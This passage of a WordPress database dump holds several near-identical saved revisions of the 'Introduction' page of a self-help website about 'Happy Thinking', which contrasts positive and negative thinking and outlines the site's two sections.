{"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-21 15:21:06', '2023-06-21 15:21:06', '', 1034, 'https://www.happythinking.com/?p=1931', 0, 'revision', '', 0);
INSERT INTO `wpou_posts` VALUES
(1935, 1, '2023-06-21 15:27:10', '2023-06-21 15:27:10', '<!-- wp:paragraph -->\n<p>First of all, welcome to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me a happier person and I am very pleased to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We all desire to be happy. Unfortunately, the world we live in is full of stress and problems, which at times can make it challenging to find happiness. Luckily, while we may not be able to always control the things happening around us, one thing we can control is how our minds â€œthinkâ€. Happiness is created by thoughts, so thinking in positive and useful ways can promote happiness in us.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, thinking in negative and useless ways can push us into unhappiness. The â€œway we thinkâ€ is an immensely powerful determinant of our happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this personâ€™s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1842,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/drowning_160623.jpg" alt="" class="wp-image-1842"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>â€œHappy Thinkingâ€ is about changing oneâ€™s negative thinking so that one can, despite the challenges around oneself, be in a state of happiness. To help one to achieve this in a logical manner, I have divided this website about Happy Thinking into two main sections.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first section, I will describe, in an easy-to-understand way, common types of negative thinking that people do. This will help one to recognise such thinking when it happens in oneâ€™s mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second section, I will describe various mental methods that oneâ€™s mind can use to change negative thinking. I like to think of such methods as â€œtoolsâ€, and just like a repairman will use various tools to repair something, one will be able to use these methods to change oneâ€™s negative thinking. These â€œmethodsâ€ are very practical so that one will be able to use them in oneâ€™s daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving methods to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way. Happy thinking is about combining these ingredients to make one into a happy person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1868,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/happycauldron170623.jpg" alt="" class="wp-image-1868"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>On the next pages (first section of this website), I will explain to you in an easy-to-understand way, common types of negative thinking that people do.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you learn about the common types of negative thinking, see which ones are applicable to you. It is very important to keep an open mind when learning about the various types of negative thinking. Think twice before assuming that you do not think in negative ways as your mind may try and convince itself (i.e. you) that it is a perfect thinker!&nbsp; You may also recognise such thinking in your friends and family. If you do, please tell them about this website!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1883,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/patternrecognition170623a.gif" alt="" class="wp-image-1883"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>When describing negative thinking, I will use certain examples to make things clear. However, to keep this website readable, I have often made these examples somewhat simplistic and they may not always exactly match your circumstances, so please add some imagination to make my examples more relevant to you.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please note that in the first section of this website, I will not mention any of the mental methods that you can use to deal with negative thinking. It would make more sense to learn about them after you understand the various types of negative thinking, as then you will be able to better appreciate how to use the methods. So as you read about the types of negative thinking, please do not think that I have forgotten to tell you about the various methods! I promise I will share them with you later.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finally do not try to understand and remember every type of negative thinking in one go. A lot of people think that by speed reading and clicking through pages, they would miraculously end up becoming happier. Unfortunately, by going too fast, the information will just bounce off oneâ€™s mind, rather than interacting with it.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1885,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/toofast_170623.jpg" alt="" class="wp-image-1885"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Like lots of things, you need to go slow so that you can appreciate and digest knowledge. This website will always be there for you, so take as long as you like to read it. You are always welcome to keep visiting here.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let''s move on to understand common types of negative thinking. Letâ€™s see how many will be relevant to you! In my case, I could recognise many of them in my own mind.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negativity-effect/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-21 15:27:10', '2023-06-21 15:27:10', '', 1034, 'https://www.happythinking.com/?p=1935', 0, 'revision', '', 0),
(2030, 1, '2023-07-19 20:02:05', '2023-07-19 20:02:05', '<!-- wp:paragraph -->\n<p>First of all, welcome to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me a happier person and I am very pleased to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We all desire to be happy. Unfortunately, the world we live in is full of stress and problems, which at times can make it challenging to find happiness. Luckily, while we may not be able to always control the things happening around us, one thing we can control is how our minds â€œthinkâ€. Happiness is created by thoughts, so thinking in positive and useful ways can promote happiness in us.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, thinking in negative and useless ways can push us into unhappiness. The â€œway we thinkâ€ is an immensely powerful determinant of our happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this personâ€™s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1842,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/drowning_160623.jpg" alt="" class="wp-image-1842"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>â€œHappy Thinkingâ€ is about changing oneâ€™s negative thinking so that one can, despite the challenges around oneself, be in a state of happiness. To help one to achieve this in a logical manner, I have divided this website about Happy Thinking into two main sections.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first section, I will describe, in an easy-to-understand way, common types of negative thinking that people do. This will help one to recognise such thinking when it happens in oneâ€™s mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second section, I will describe various mental methods that oneâ€™s mind can use to change negative thinking. I like to think of such methods as â€œtoolsâ€, and just like a repairman will use various tools to repair something, one will be able to use these methods to change oneâ€™s negative thinking. These â€œmethodsâ€ are very practical so that one will be able to use them in oneâ€™s daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the next pages (first section of this website), I will explain to you in an easy-to-understand way, common types of negative thinking that people do.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you learn about the common types of negative thinking, see which ones are applicable to you. It is very important to keep an open mind when learning about the various types of negative thinking. Think twice before assuming that you do not think in negative ways as your mind may try and convince itself (i.e. you) that it is a perfect thinker!&nbsp; You may also recognise such thinking in your friends and family. If you do, please tell them about this website!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1883,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/patternrecognition170623a.gif" alt="" class="wp-image-1883"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>When describing negative thinking, I will use certain examples to make things clear. However, to keep this website readable, I have often made these examples somewhat simplistic and they may not always exactly match your circumstances, so please add some imagination to make my examples more relevant to you.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please note that in the first section of this website, I will not mention any of the mental methods that you can use to deal with negative thinking. It would make more sense to learn about them after you understand the various types of negative thinking, as then you will be able to better appreciate how to use the methods. So as you read about the types of negative thinking, please do not think that I have forgotten to tell you about the various methods! I promise I will share them with you later.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finally do not try to understand and remember every type of negative thinking in one go. A lot of people think that by speed reading and clicking through pages, they would miraculously end up becoming happier. Unfortunately, by going too fast, the information will just bounce off oneâ€™s mind, rather than interacting with it.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1885,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/toofast_170623.jpg" alt="" class="wp-image-1885"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Like lots of things, you need to go slow so that you can appreciate and digest knowledge. This website will always be there for you, so take as long as you like to read it. You are always welcome to keep visiting here.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let''s move on to understand common types of negative thinking. Letâ€™s see how many will be relevant to you! In my case, I could recognise many of them in my own mind.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negativity-effect/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-07-19 20:02:05', '2023-07-19 20:02:05', '', 1034, 'https://www.happythinking.com/?p=2030', 0, 'revision', '', 0),
(1952, 1, '2023-06-21 19:06:44', '2023-06-21 19:06:44', '<!-- wp:paragraph -->\n<p>First of all, welcome to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me a happier person and I am very pleased to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We all desire to be happy. Unfortunately, the world we live in is full of stress and problems, which at times can make it challenging to find happiness. Luckily, while we may not be able to always control the things happening around us, one thing we can control is how our minds â€œthinkâ€. Happiness is created by thoughts, so thinking in positive and useful ways can promote happiness in us.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, thinking in negative and useless ways can push us into unhappiness. The â€œway we thinkâ€ is an immensely powerful determinant of our happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this personâ€™s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1842,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/drowning_160623.jpg" alt="" class="wp-image-1842"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>â€œHappy Thinkingâ€ is about changing oneâ€™s negative thinking so that one can, despite the challenges around oneself, be in a state of happiness. To help one to achieve this in a logical manner, I have divided this website about Happy Thinking into two main sections.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first section, I will describe, in an easy-to-understand way, common types of negative thinking that people do. This will help one to recognise such thinking when it happens in oneâ€™s mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second section, I will describe various mental methods that oneâ€™s mind can use to change negative thinking. I like to think of such methods as â€œtoolsâ€, and just like a repairman will use various tools to repair something, one will be able to use these methods to change oneâ€™s negative thinking. These â€œmethodsâ€ are very practical so that one will be able to use them in oneâ€™s daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving methods to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way. Happy thinking is about combining these ingredients to make one into a happy person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1868,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/happycauldron170623.jpg" alt="" class="wp-image-1868"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>On the next pages (first section of this website), I will explain to you in an easy-to-understand way, common types of negative thinking that people do.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you learn about the common types of negative thinking, see which ones are applicable to you. It is very important to keep an open mind when learning about the various types of negative thinking. Think twice before assuming that you do not think in negative ways as your mind may try and convince itself (i.e. you) that it is a perfect thinker!&nbsp; You may also recognise such thinking in your friends and family. If you do, please tell them about this website!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1883,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/patternrecognition170623a.gif" alt="" class="wp-image-1883"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>When describing negative thinking, I will use certain examples to make things clear. However, to keep this website readable, I have often made these examples somewhat simplistic and they may not always exactly match your circumstances, so please add some imagination to make my examples more relevant to you.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please note that in the first section of this website, I will not mention any of the mental methods that you can use to deal with negative thinking. It would make more sense to learn about them after you understand the various types of negative thinking, as then you will be able to better appreciate how to use the methods. So as you read about the types of negative thinking, please do not think that I have forgotten to tell you about the various methods! I promise I will share them with you later.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finally do not try to understand and remember every type of negative thinking in one go. A lot of people think that by speed reading and clicking through pages, they would miraculously end up becoming happier. Unfortunately, by going too fast, the information will just bounce off oneâ€™s mind, rather than interacting with it.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1885,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/toofast_170623.jpg" alt="" class="wp-image-1885"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Like lots of things, you need to go slow so that you can appreciate and digest knowledge. This website will always be there for you, so take as long as you like to read it. You are always welcome to keep visiting here.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let''s move on to understand common types of negative thinking. Letâ€™s see how many will be relevant to you! In my case, I could recognise many of them in my own mind.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negativity-effect/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-21 19:06:44', '2023-06-21 19:06:44', '', 1034, 'https://www.happythinking.com/?p=1952', 0, 'revision', '', 0),
(1934, 1, '2023-06-21 15:25:18', '2023-06-21 15:25:18', '<!-- wp:paragraph -->\n<p>First of all, welcome to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me a happier person and I am very pleased to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We all desire to be happy. Unfortunately, the world we live in is full of stress and problems, which at times can make it challenging to find happiness. Luckily, while we may not be able to always control the things happening around us, one thing we can control is how our minds â€œthinkâ€. Happiness is created by thoughts, so thinking in positive and useful ways can promote happiness in us.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, thinking in negative and useless ways can push us into unhappiness. The â€œway we thinkâ€ is an immensely powerful determinant of our happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this personâ€™s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1842,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/drowning_160623.jpg" alt="" class="wp-image-1842"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>â€œHappy Thinkingâ€ is about changing oneâ€™s negative thinking so that one can, despite the challenges around oneself, be in a state of happiness. To help one to achieve this in a logical manner, I have divided this website about Happy Thinking into two main sections.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first section, I will describe, in an easy-to-understand way, common types of negative thinking that people do. This will help one to recognise such thinking when it happens in oneâ€™s mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second section, I will describe various mental methods that oneâ€™s mind can use to change negative thinking. I like to think of such methods as â€œtoolsâ€, and just like a repairman will use various tools to repair something, one will be able to use these methods to change oneâ€™s negative thinking. These â€œmethodsâ€ are very practical so that one will be able to use them in oneâ€™s daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving methods to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way. Happy thinking is about combining these ingredients to make one into a happy person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1868,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/happycauldron170623.jpg" alt="" class="wp-image-1868"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>On the next pages (first section of this website), I will explain to you in an easy-to-understand way, common types of negative thinking that people do.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you learn about the common types of negative thinking, see which ones are applicable to you. It is very important to keep an open mind when learning about the various types of negative thinking. Think twice before assuming that you do not think in negative ways as your mind may try and convince itself (i.e. you) that it is a perfect thinker!&nbsp; You may also recognise such thinking in your friends and family. If you do, please tell them about this website!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1883,"sizeSlug":"full","linkDestination":"none"} 